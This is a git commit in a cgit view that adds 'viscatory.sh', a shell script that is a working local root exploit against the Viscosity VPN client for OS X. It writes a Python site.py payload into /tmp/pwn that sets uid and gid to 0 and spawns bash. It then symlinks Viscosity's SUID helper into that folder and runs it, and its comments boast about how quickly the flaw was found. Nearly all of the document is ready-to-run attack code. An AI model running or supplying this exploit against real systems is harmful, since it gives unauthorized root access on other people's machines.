From 0d36d2ec75f3098a3a250d84dc38962f0aedfeb6 Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Mon, 13 Aug 2012 05:51:52 +0200
Subject: Initial commit of easy local root.

---
 viscatory.sh | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100755 viscatory.sh

(limited to 'viscatory.sh')

diff --git a/viscatory.sh b/viscatory.sh
new file mode 100755
index 0000000..4f323b3
--- /dev/null
+++ b/viscatory.sh
@@ -0,0 +1,32 @@
+#!/bin/sh
+#
+##########################
+#       Viscatory        #
+#                        #
+#         zx2c4          #
+##########################
+#
+# After the hullabaloo from the Tunnelblick local root, savy Mac users
+# began defending Viscosity, another OS X VPN client. They figured, since
+# they spent money on Viscosity, surely it would be better designed than
+# the free alternative.
+#
+# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
+# the win. Here, the SUID helper will execute site.py in its enclosing
+# folder. A simple symlink, and we have root.
+
+echo "[+] Crafting payload."
+mkdir -p -v /tmp/pwn
+cat > /tmp/pwn/site.py <<_EOF
+import os
+print "[+] Cleaning up."
+os.system("rm -rvf /tmp/pwn")
+print "[+] Getting root."
+os.setuid(0)
+os.setgid(0)
+os.execl("/bin/bash", "bash")
+_EOF
+echo "[+] Making symlink."
+ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
+echo "[+] Running vulnerable SUID helper."
+exec /tmp/pwn/root
-- 
cgit v1.2.3-59-g8ed1b